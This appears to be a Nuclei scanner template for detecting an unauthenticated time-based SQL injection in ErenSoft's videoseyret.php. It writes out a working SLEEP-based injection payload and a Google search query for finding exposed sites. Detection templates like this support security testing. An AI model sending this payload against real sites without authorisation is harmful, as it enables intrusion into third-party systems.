Description
SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
id: erensoft-sqli
info:
name: ErenSoft - SQL Injection
author: r3Y3r53
severity: high
description: |
SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
reference:
- https://cxsecurity.com/issue/WLB-2023070055
classification:
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
google-query: intext:"Kodlama:Erensoft"
tags: sqli,unauth,erensoft,vuln
http:
- raw:
- |
@timeout: 20s
GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration >= 6
- status_code == 200
- contains(content_type, "text/html") && contains(body, "videoseyret")
condition: and
- type: word
words:
- class="entry-title"
# digest: 4a0a00473045022100d2de40f9530fc61891492ce803d6f568cfcf6dffd81fd41b8ada8b118fcc791b02200c302a70e5aaf28f56388745a40c9cb32bc88b8f18066d18e3ba5e705849b44e:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.